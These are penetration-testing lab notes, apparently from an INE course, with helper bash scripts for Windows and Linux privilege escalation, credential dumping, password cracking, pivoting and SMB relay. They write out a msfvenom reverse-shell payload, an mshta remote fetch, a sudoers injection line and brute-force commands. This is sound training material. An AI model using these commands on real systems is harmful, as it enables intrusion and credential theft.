Network Pentest

System/Host Based Attacks

  • WebDAV upload with Metasploit
    • find the DAV directory with dirb: dirb http://demo.ine.local
    • probe it with davtest: davtest -url http://demo.ine.local/webdav (it checks the allowed methods, PUTs test files of several types and reports which of them execute)
    • if the directory needs credentials, pass them: davtest -auth bob:password_123321 -url http://demo.ine.local/webdav
    • msf module exploit/windows/iis/iis_webdav_upload_asp, set RHOSTS, HttpUsername, HttpPassword and PATH /webdav/metasploit%RAND%.asp (the target must allow PUT and .asp must be executable in that directory)
  • SMB server and psexec
    • bruteforce with auxiliary/scanner/smb/smb_login, set USER_FILE, PASS_FILE, RHOSTS and VERBOSE
    • gain access with exploit/windows/smb/psexec, set RHOSTS, SMBUser and SMBPass (the account must be a local administrator, since psexec writes its service binary to ADMIN$)
  • insecure RDP service
    • detect the service with auxiliary/scanner/rdp/rdp_scanner (set RPORT when it is not on 3389, as here)
    • bruteforce with hydra: hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333
    • connect with xfreerdp: xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333
  • WinRM exploitation with msf
    • bruteforce with auxiliary/scanner/winrm/winrm_login, set RHOSTS, USER_FILE, PASS_FILE and VERBOSE; the module also insists on PASSWORD being set, so give it any value
    • check the accepted auth methods with auxiliary/scanner/winrm/winrm_auth_methods
    • run a single command with auxiliary/scanner/winrm/winrm_cmd (set CMD, USERNAME and PASSWORD)
    • get a meterpreter session with exploit/windows/winrm/winrm_script_exec, set FORCE_VBS true
  • UAC bypass with UACMe
    • HTTP File Server (HFS) is the example target
    • searchsploit hfs to find the exploit
    • msf module exploit/windows/http/rejetto_hfs_exec
    • usual meterpreter steps: getuid, sysinfo, migrate to a stable process (ps -S explorer.exe, migrate 2332) and try getsystem
    • shell and net localgroup administrators show the user is a local admin, but under UAC the session holds the filtered medium-integrity token (whoami /groups shows Medium Mandatory Level), which is why getsystem fails
    • to get a high-integrity token, upload backdoor.exe built with msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.31.2 LPORT=4444 -f exe > backdoor.exe, together with Akagi64.exe from UACMe
    • start a listener with exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_tcp, then run Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe (first argument is the UACMe method number, second the program to launch elevated); the payload connects back with a high-integrity token
    • in the new session migrate into lsass.exe (ps -S lsass.exe, migrate 496) and dump hashes with hashdump
  • privilege escalation using token impersonation
    • exploit the HFS server with exploit/windows/http/rejetto_hfs_exec
    • load the incognito extension: load incognito, then list the available tokens with list_tokens -u
    • impersonate a token: impersonate_token ATTACKDEFENSE\\Administrator (the backslash has to be doubled); getuid afterwards should show the impersonated user
  • unattended installation
    • run PowerSploit's PowerUp.ps1: powershell -ep bypass (execution policy bypass), . .\PowerUp.ps1, Invoke-PrivescAudit
    • it reports the answer file at C:\Windows\Panther\Unattend.xml (other usual spots: C:\Windows\Panther\Unattend\ and C:\Windows\System32\sysprep\); the <Password><Value> inside is base64, and when Windows Setup wrote it the element name ("Password" or "AdministratorPassword") was appended to the password before encoding, so strip that suffix after decoding
    • use the recovered password with runas.exe /user:administrator cmd
    • for a meterpreter session use exploit/windows/misc/hta_server, copy the URL it prints and run mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta on the Windows host
  • kiwi extension
    • exploit BadBlue 2.7 with exploit/windows/http/badblue_passthru, migrate -N lsass.exe (kiwi needs a SYSTEM-level session that can read LSASS), then load kiwi
    • creds_all dumps every credential kiwi can reach (NTLM hashes and, where present, plaintext), lsa_dump_sam dumps the local SAM hashes along with the SysKey used to decrypt them, lsa_dump_secrets dumps the LSA secrets (service account and cached credentials)
  • ProFTPD recon
    • hydra bruteforce: hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local -t 4 ftp
    • nmap bruteforce: nmap --script ftp-brute --script-args userdb=/root/users -p 21 demo.ine.local
  • Samba recon
    • msf bruteforce: auxiliary/scanner/smb/smb_login, set PASS_FILE and SMBUser
    • with hydra: hydra -l admin -P /usr/share/wordlists/rockyou.txt demo.ine.local smb
    • with smbmap, which also shows the permissions the account has on each share: smbmap -H demo.ine.local -u admin -p password1
    • list the shares: smbclient -L demo.ine.local -U jane
    • a share can exist without appearing in that listing (browseable = no), so try it directly: smbclient //demo.ine.local/jane -U jane; connect to a share: smbclient //demo.ine.local/admin -U admin
    • list the named pipes with auxiliary/scanner/smb/pipe_auditor; pipes are reached through the IPC$ share and carry the RPC traffic used for inter-process communication
    • enum4linux with RID cycling to get the SID and the users behind it: enum4linux -r -u "admin" -p "password1" demo.ine.local
  • cronjobs
    • a root cronjob runs a script we can write to, so inject a line that adds the current user to sudoers: printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh, wait for the job to fire, then sudo -l to confirm and sudo su for a root shell
  • exploiting SUID
    • the welcome binary has the SUID bit set (find / -perm -4000 -type f 2>/dev/null lists such files), so it runs with its owner's privileges; it is owned by root, and running it is enough to get a root shell
  • cracking linux passwords
    • exploit ProFTPD with exploit/unix/ftp/proftpd_133c_backdoor, set PAYLOAD payload/cmd/unix/reverse
    • dump the hashes with post/linux/gather/hashdump, set SESSION 1 (needs root, it reads /etc/shadow and stores the hashes as loot)
    • crack them with auxiliary/analyze/crack_linux, set SHA512 true; the module has one flag per hash type, so match it to the prefix ($6$ is sha512crypt, $5$ sha256crypt, $1$ md5crypt)
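
The davtest step in the WebDAV notes works by asking the DAV directory which HTTP methods it accepts and then trying uploads. The following is an added example (not part of the original notes) that does the first half with curl and plain shell: it parses the OPTIONS response and reports the write-capable methods. The URL and credentials in the usage comment are the ones from the notes; the sample response headers are constructed, not captured from a real host.

```bash
#!/usr/bin/env bash
# Check which WebDAV methods a directory allows, the way davtest's first
# probe does. Added example, not from the original notes. Assumes curl and
# POSIX grep/cut/tr; the sample headers below are constructed.
set -e

# dav_methods HEADER_FILE -> the methods from the Allow: header, one per
#   line, upper-cased (servers differ in spacing, case and CRLF endings)
dav_methods() {
    grep -i '^Allow:' "$1" | cut -d: -f2- | tr ',' '\n' |
        tr -d ' \r' | tr 'a-z' 'A-Z' | grep -v '^$'
}

# dav_write_methods HEADER_FILE -> the subset that lets us change content.
#   PUT is what iis_webdav_upload_asp needs; MOVE matters because PUT of
#   file.txt followed by MOVE to file.asp sidesteps extension filters;
#   DELETE and PROPPATCH are worth reporting on their own.
dav_write_methods() {
    dav_methods "$1" | grep -x -E 'PUT|MOVE|DELETE|PROPPATCH' || true
}

# dav_probe URL [USER:PASS] -> fetch the OPTIONS response from a live server
#   and report whether it speaks WebDAV and which write methods are exposed
dav_probe() {
    local url="$1" creds="${2:-}" hdr
    hdr=$(mktemp)
    if [ -n "$creds" ]; then
        curl -s -o /dev/null -D "$hdr" -X OPTIONS -u "$creds" "$url"
    else
        curl -s -o /dev/null -D "$hdr" -X OPTIONS "$url"
    fi
    if grep -qi '^DAV:' "$hdr"; then echo "WebDAV: yes"; else echo "WebDAV: no"; fi
    echo "write methods:"
    dav_write_methods "$hdr"
    rm -f "$hdr"
}

# Constructed sample of an IIS WebDAV OPTIONS response (not captured from a
# real host) so the parsing can be exercised offline.
write_sample_headers() {
    printf 'HTTP/1.1 200 OK\r\nAllow: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK, PUT\r\nDAV: 1,2\r\nMS-Author-Via: DAV\r\n\r\n' > "$1"
}

# Usage against the lab target from the notes:
#   dav_probe http://demo.ine.local/webdav/ bob:password_123321
```

If PUT is absent the Metasploit module has nothing to work with; if PUT is present but .asp uploads are refused, MOVE is the next thing to try.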
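
The unattended-installation notes say to base64-decode the password value. Here is an added example (not from the original notes; the sample answer file is constructed) that pulls every Password and AdministratorPassword value out of an Unattend.xml and decodes it. It handles the two encodings seen in practice: the UTF-16LE form Windows Setup writes, where the element name is appended to the password before encoding, and the plain ASCII base64 some lab images use.

```bash
#!/usr/bin/env bash
# Recover passwords from an unattended-install answer file. Added example,
# not from the original notes. Assumes POSIX awk/tr and a base64 that
# accepts -d; the sample Unattend.xml below is constructed.
set -e

# decode_unattend_value B64 [ELEMENT]
#   Windows Setup stores <Value> as base64 of the UTF-16LE string
#   "<password><ElementName>", e.g. "hunter2Password" under <AutoLogon> or
#   "hunter2AdministratorPassword" under <UserAccounts>. Lab images often
#   use plain ASCII base64 and sometimes the short "Password" suffix, so NUL
#   bytes are dropped (harmless for ASCII) and both suffixes are tried.
decode_unattend_value() {
    local b64="$1" element="${2:-Password}" raw
    raw=$(printf '%s' "$b64" | base64 -d | tr -d '\000')
    case "$raw" in
        *"$element") printf '%s\n' "${raw%"$element"}" ;;
        *Password)   printf '%s\n' "${raw%Password}" ;;
        *)           printf '%s\n' "$raw" ;;   # no suffix: PlainText was probably true
    esac
}

# extract_unattend_passwords FILE -> "Element base64value" per password found
#   Tracks which password element we are inside and grabs its <Value>.
extract_unattend_passwords() {
    awk '
        /<Password>/              { elem = "Password" }
        /<AdministratorPassword>/ { elem = "AdministratorPassword" }
        /<\/Password>|<\/AdministratorPassword>/ { elem = "" }
        elem != "" && match($0, /<Value>[^<]*<\/Value>/) {
            print elem, substr($0, RSTART + 7, RLENGTH - 15)
        }' "$1"
}

# dump_unattend_creds FILE -> "Element decodedpassword" per password found
dump_unattend_creds() {
    extract_unattend_passwords "$1" | while read -r elem b64; do
        printf '%s %s\n' "$elem" "$(decode_unattend_value "$b64" "$elem")"
    done
}

# Constructed sample: AutoLogon password "Pa55" in Windows Setup's UTF-16LE
# form, administrator password "Secret42" in the plain ASCII form.
write_sample_unattend() {
    cat > "$1" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UABhADUANQBQAGEAcwBzAHcAbwByAGQA</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>U2VjcmV0NDJBZG1pbmlzdHJhdG9yUGFzc3dvcmQ=</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
EOF
}

# On a real box, copy the file off first and run:
#   dump_unattend_creds Unattend.xml
# Usual locations: C:\Windows\Panther\Unattend.xml,
#   C:\Windows\Panther\Unattend\Unattend.xml, C:\Windows\System32\sysprep\
```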
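
The cronjob and SUID notes both come down to spotting a file that runs with root's privileges but that a low-privileged user can influence. This added example (not from the original notes) automates the two checks: which root cron targets are writable or missing, and which binaries carry the SUID bit. It assumes a system-crontab layout (minute hour dom mon dow user command) and POSIX awk/find; the crontab and files used in the test are constructed.

```bash
#!/usr/bin/env bash
# Local privesc checks behind the cron and SUID notes. Added example, not
# from the original notes. Assumes POSIX awk/find and the /etc/crontab field
# layout (m h dom mon dow user command); test data is constructed.
set -e

# check_cron_targets CRONTAB_FILE
#   For every entry that runs as root, take the first word of the command
#   (the script or binary) and report it when we could influence it:
#     WRITABLE <path>  file exists and is writable by us or by everyone
#     MISSING  <path>  file is absent but its directory is writable, so we
#                      could plant it before the job fires
#   Relative commands, comments, blank lines and VAR=value lines are skipped.
check_cron_targets() {
    awk '
        /^[[:space:]]*#/ || NF == 0 || $1 ~ /=/ { next }
        $1 ~ /^@/ { if (NF >= 3 && $2 == "root") print $3; next }   # @reboot root cmd
        NF >= 7 && $6 == "root" { print $7 }
    ' "$1" |
    while read -r target; do
        case "$target" in /*) ;; *) continue ;; esac
        if [ -e "$target" ]; then
            if [ -w "$target" ] || [ -n "$(find "$target" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
                printf 'WRITABLE %s\n' "$target"
            fi
        elif [ -w "$(dirname "$target")" ]; then
            printf 'MISSING %s\n' "$target"
        fi
    done
}

# find_suid [ROOT]
#   List files with the SUID bit under ROOT (default /). Anything outside the
#   stock set (su, sudo, passwd, mount, ...) deserves a look: it executes with
#   its owner's privileges, which is exactly what the "welcome" binary did.
find_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null || true
}

# Typical use on the target:
#   check_cron_targets /etc/crontab
#   for f in /etc/cron.d/*; do check_cron_targets "$f"; done
#   find_suid /
```

A WRITABLE hit is the situation from the notes: overwrite the script with the sudoers line and wait for the job. A MISSING hit is just as good, since the job will run whatever is created at that path.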
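
crack_linux hands the dumped hashes to John the Ripper. The added example below (not from the original notes) shows what that involves for crypt(3) hashes: read the algorithm id and salt out of each /etc/shadow entry, recompute the hash for a candidate with openssl passwd and compare, over a small wordlist. It assumes OpenSSL 1.1.1 or later (for the -1/-5/-6 options) and default rounds; hashes carrying a rounds= field are skipped. The shadow file and wordlist in the test are constructed.

```bash
#!/usr/bin/env bash
# Minimal wordlist attack on crypt(3) hashes from a dumped /etc/shadow, the
# job that auxiliary/analyze/crack_linux delegates to John. Added example,
# not from the original notes. Assumes OpenSSL 1.1.1+ and default rounds.
set -e

# hash_algo HASH -> md5crypt | sha256crypt | sha512crypt | other
#   The "$id$" prefix is what the crack_linux MD5/SHA256/SHA512 flags map to.
hash_algo() {
    case "$1" in
        '$1$'*) echo md5crypt ;;
        '$5$'*) echo sha256crypt ;;
        '$6$'*) echo sha512crypt ;;
        *)      echo other ;;
    esac
}

# check_candidate HASH WORD -> exit 0 if WORD hashes to HASH
#   Re-derives the hash with the same id and salt; a match means WORD is the
#   password. Hashes with a custom "rounds=" field are left to John.
check_candidate() {
    local hash="$1" word="$2" id salt flag
    id=$(printf '%s' "$hash" | cut -d'$' -f2)
    salt=$(printf '%s' "$hash" | cut -d'$' -f3)
    case "$salt" in rounds=*) return 1 ;; esac
    case "$id" in 1) flag=-1 ;; 5) flag=-5 ;; 6) flag=-6 ;; *) return 1 ;; esac
    [ "$(openssl passwd "$flag" -salt "$salt" "$word")" = "$hash" ]
}

# crack_shadow SHADOW_FILE WORDLIST -> "user:password" for every hit
#   Locked or passwordless accounts (*, !, !!, empty) are skipped, as are
#   hash types this script does not recompute (yescrypt, bcrypt, DES).
crack_shadow() {
    local shadow="$1" wordlist="$2" user hash rest word
    while IFS=: read -r user hash rest; do
        case "$hash" in ''|'*'|'!'*) continue ;; esac
        [ "$(hash_algo "$hash")" != other ] || continue
        while read -r word; do
            if check_candidate "$hash" "$word"; then
                printf '%s:%s\n' "$user" "$word"
                break
            fi
        done < "$wordlist"
    done < "$shadow"
}

# Usage with the loot file hashdump wrote and the msf wordlist:
#   crack_shadow /root/.msf4/loot/<...>_linux.hashes.passwd_<...>.txt \
#       /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
```

This is orders of magnitude slower than John (one openssl process per guess), which is the point of handing the job to crack_linux; it exists to make visible what the SHA512 flag is selecting.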

Network-Based Attacks

  • NetBIOS/SMB hacking
    • get the security mode (signing, guest and anonymous handling): nmap -p445 --script smb-security-mode demo.ine.local
    • check for anonymous access: smbclient -L demo.ine.local
    • enumerate users: nmap -p445 --script smb-enum-users.nse demo.ine.local
    • hydra with that user list: hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
    • meterpreter with the found credentials: exploit/windows/smb/psexec
    • pivot by routing the internal network through the session: run autoroute -s 10.0.22.69/20
    • start a SOCKS proxy on the port proxychains expects (cat /etc/proxychains4.conf, default socks4 127.0.0.1 9050): use auxiliary/server/socks_proxy, set SRVPORT 9050 and VERSION 4a
    • nmap through the proxy: proxychains nmap demo1.ine.local -sT -Pn -sV -p 445 (connect scans only and no ping, since SOCKS relays TCP connections, not raw packets)
    • migrate -N explorer.exe, then net view 10.0.22.69 from a shell to list shares on the internal host
    • map a share to a drive: net use D: \\10.0.22.69\Documents
  • SNMP analysis
    • bruteforce the community string: nmap -sU -p 161 --script=snmp-brute demo.ine.local
    • walk the tree with it: snmpwalk -v 1 -c public demo.ine.local
    • run every SNMP script: nmap -sU -p 161 --script "snmp-*" demo.ine.local > snmp_output (quote the glob so the shell does not expand it; snmp-win32-users is the one that lists accounts)
    • bruteforce SMB with those users: hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
    • log in over SMB with exploit/windows/smb/psexec
  • DNS and SMB relay attack
    • set up the relay with exploit/windows/smb/smb_relay (SRVHOST is the address the victim gets sent to, SMBHOST the server the captured authentication is relayed to)
    • configure dnsspoof so the victim's lookups resolve to the attacker: echo "172.16.5.101 *.sportsfoo.com" > dns, then dnsspoof -i eth1 -f dns
    • enable IP forwarding so the intercepted traffic keeps flowing: echo 1 > /proc/sys/net/ipv4/ip_forward
    • ARP spoof both directions so the traffic passes through us: arpspoof -i eth1 -t 172.16.5.5 172.16.5.1 and arpspoof -i eth1 -t 172.16.5.1 172.16.5.5
    • when the victim resolves a sportsfoo.com name and connects to the relay over SMB, its NTLM authentication is forwarded to SMBHOST and a meterpreter session comes back; this only works while SMB signing is not required on the host being relayed to
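
The pivot steps in the NetBIOS notes require the SOCKS server that msf starts to sit on the port and protocol version proxychains is configured for, otherwise proxychains silently fails to connect. The following added example (not from the original notes; the sample proxychains.conf is constructed) reads the active entry from proxychains4.conf and emits a matching resource script for auxiliary/server/socks_proxy.

```bash
#!/usr/bin/env bash
# Keep the msf SOCKS server and proxychains in agreement. Added example, not
# from the original notes; assumes POSIX awk and the proxychains 4.x config
# format (a [ProxyList] section with "type host port" lines).
set -e

# proxy_from_conf CONF -> "type host port" of the first active entry in
#   [ProxyList]; proxychains uses entries in order, so with strict_chain this
#   is the proxy every connection goes to first.
proxy_from_conf() {
    awk '
        /^[[:space:]]*#/ || NF == 0 { next }
        /^\[ProxyList\]/ { inlist = 1; next }
        /^\[/            { inlist = 0 }
        inlist && $1 ~ /^(socks4|socks5|http)$/ { print $1, $2, $3; exit }
    ' "$1"
}

# socks_rc CONF -> msfconsole resource script that starts
#   auxiliary/server/socks_proxy on that host/port with the matching VERSION
#   (4a for socks4, 5 for socks5). An "http" entry has no counterpart in the
#   module, so it is rejected rather than silently mismatched.
socks_rc() {
    local ver
    set -- $(proxy_from_conf "$1")
    [ $# -eq 3 ] || { echo "no proxy entry in [ProxyList]" >&2; return 1; }
    case "$1" in
        socks4) ver=4a ;;
        socks5) ver=5 ;;
        *) echo "proxychains expects $1, socks_proxy only serves SOCKS" >&2; return 1 ;;
    esac
    printf 'use auxiliary/server/socks_proxy\nset SRVHOST %s\nset SRVPORT %s\nset VERSION %s\nrun -j\n' "$2" "$3" "$ver"
}

# Constructed proxychains4.conf: the stock layout, but with the default
# socks4 line commented out and a socks5 entry in its place.
write_sample_conf() {
    cat > "$1" <<'EOF'
# proxychains.conf  VER 4.x
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
EOF
}

# Usage, from a second shell while msfconsole holds the session and route:
#   socks_rc /etc/proxychains4.conf > /tmp/socks.rc
# then inside msfconsole:
#   resource /tmp/socks.rc
#   proxychains nmap -sT -Pn -sV -p 445 10.0.22.69   (from the shell again)
```

Binding SRVHOST to the loopback address from the config is deliberate: the proxy exposes the internal network, so it should not listen on every interface.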

Written By

GitHub Contributor Team